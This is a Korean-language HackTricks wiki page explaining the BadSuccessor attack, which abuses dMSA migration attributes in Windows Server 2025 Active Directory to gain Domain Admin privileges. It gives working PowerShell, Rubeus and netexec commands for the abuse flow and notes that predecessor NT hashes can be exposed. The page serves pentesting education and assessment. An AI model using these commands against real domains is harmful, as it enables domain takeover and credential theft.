BadSuccessor
Tip
AWS Hacking을 배우고 연습하세요:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요:HackTricks Training Azure Red Team Expert (AzRTE)
평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.
HackTricks 지원하기
- subscription plans를 확인하세요!
- 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
- HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.
Overview
BadSuccessor는 delegated Managed Service Account (dMSA) 마이그레이션 워크플로를 악용하며, 이는 Windows Server 2025에서 도입되었습니다. dMSA는 **msDS-ManagedAccountPrecededByLink**를 통해 기존 계정과 연결될 수 있고, **msDS-DelegatedMSAState**에 저장된 마이그레이션 상태를 통해 이동할 수 있습니다. 공격자가 쓰기 가능한 OU에 dMSA를 생성하고 해당 속성들을 제어할 수 있다면, KDC는 연결된 계정의 authorization context를 가진 공격자 제어 dMSA에 대한 티켓을 발급할 수 있습니다.
실제로 이는 위임된 OU 권한만 가진 낮은 권한 사용자가 새 dMSA를 생성하고, 이를 Administrator에 연결한 뒤, 마이그레이션 상태를 완료하고, 그 결과 PAC에 Domain Admins 같은 권한 그룹이 포함된 TGT를 얻을 수 있음을 의미합니다.
dMSA migration details that matter
- dMSA는 Windows Server 2025 기능입니다.
Start-ADServiceAccountMigration는 마이그레이션을 started 상태로 설정합니다.Complete-ADServiceAccountMigration는 마이그레이션을 completed 상태로 설정합니다.msDS-DelegatedMSAState = 1은 마이그레이션이 시작되었음을 의미합니다.msDS-DelegatedMSAState = 2는 마이그레이션이 완료되었음을 의미합니다.- 정당한 마이그레이션 중에는 dMSA가 이전 계정을 투명하게 대체하도록 설계되어 있으므로, KDC/LSA는 이전 계정이 이미 가지고 있던 접근 권한을 보존합니다.
Microsoft Learn도 마이그레이션 동안 원래 계정이 dMSA에 연결되며, dMSA는 이전 계정이 접근할 수 있던 것에 접근하도록 의도되었다고 설명합니다. BadSuccessor는 바로 이 보안 가정을 악용합니다.
Requirements
- dMSA exists인 도메인, 즉 AD 측에 Windows Server 2025 지원이 존재해야 합니다.
- 공격자가 어떤 OU에서
msDS-DelegatedManagedServiceAccount객체를 create할 수 있거나, 이에 준하는 광범위한 자식 객체 생성 권한을 가지고 있어야 합니다. - 공격자가 관련 dMSA 속성들을 write할 수 있거나, 방금 생성한 dMSA를 완전히 제어할 수 있어야 합니다.
- 공격자가 도메인에 조인된 컨텍스트 또는 LDAP/Kerberos에 도달 가능한 터널에서 Kerberos 티켓을 요청할 수 있어야 합니다.
Practical checks
가장 깔끔한 operator signal은 도메인/포리스트 레벨을 확인하고, 환경이 이미 새로운 Server 2025 스택을 사용 중인지 확인하는 것입니다:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
값으로 Windows2025Domain 및 Windows2025Forest를 보면, BadSuccessor / dMSA migration abuse를 우선 점검하세요.
또한 public tooling으로 dMSA 생성을 위해 위임된 writable OU를 열거할 수 있습니다:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Abuse flow
- dMSA를 생성 권한이 위임된 OU에서 생성합니다.
- **
msDS-ManagedAccountPrecededByLink**를CN=Administrator,CN=Users,DC=corp,DC=local같은 권한 있는 대상의 DN으로 설정합니다. - 마이그레이션이 완료되었음을 표시하기 위해 **
msDS-DelegatedMSAState**를2로 설정합니다. - 새 dMSA에 대해 TGT를 요청하고, 반환된 티켓을 사용해 권한 있는 서비스에 접근합니다.
PowerShell example:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Ticket request / 운영 도구 예시:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
이것이 단순한 privilege escalation보다 더 중요한 이유
정상적인 migration 동안, Windows는 cutover 이전에 이전 account에 대해 발급된 tickets도 처리할 수 있도록 새 dMSA가 필요합니다. 그래서 dMSA 관련 ticket material에는 KERB-DMSA-KEY-PACKAGE 흐름에서 current 및 previous keys가 포함될 수 있습니다.
공격자가 제어하는 fake migration에서는, 이 동작으로 인해 BadSuccessor는 다음이 될 수 있습니다:
- PAC에서 privileged group SIDs를 상속받는 Privilege escalation
- 이전 key 처리로 인해 취약한 workflow에서 predecessor의 RC4/NT hash에 해당하는 material이 노출될 수 있으므로 Credential material exposure
이 때문에 이 technique은 직접적인 domain takeover뿐 아니라 pass-the-hash 또는 더 광범위한 credential compromise 같은 후속 operation에도 유용합니다.
Patch status에 대한 참고 사항
원래 BadSuccessor 동작은 단순한 2025 preview issue가 아닙니다. Microsoft는 이를 CVE-2025-53779로 지정했고 2025년 8월에 security update를 배포했습니다. 다음 경우를 위해 이 attack을 문서화해 두십시오:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- assessment 중 OU delegations 및 dMSA exposure 검증
dMSA가 존재한다고 해서 Windows Server 2025 domain이 취약하다고 가정하지 마십시오. patch level을 확인하고 신중하게 테스트하십시오.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
AWS Hacking을 배우고 연습하세요:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking을 배우고 연습하세요:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking을 배우고 연습하세요:HackTricks Training Azure Red Team Expert (AzRTE)
평가 트랙 (ARTA/GRTA/AzRTA)과 Linux Hacking Expert (LHE)를 보려면 전체 HackTricks Training 카탈로그를 둘러보세요.
HackTricks 지원하기
- subscription plans를 확인하세요!
- 💬 Discord group, telegram group에 참여하고, X/Twitter에서 @hacktricks_live를 팔로우하거나, LinkedIn page와 YouTube channel을 확인하세요.
- HackTricks 및 HackTricks Cloud github repos에 PR을 제출해 hacking tricks를 공유하세요.


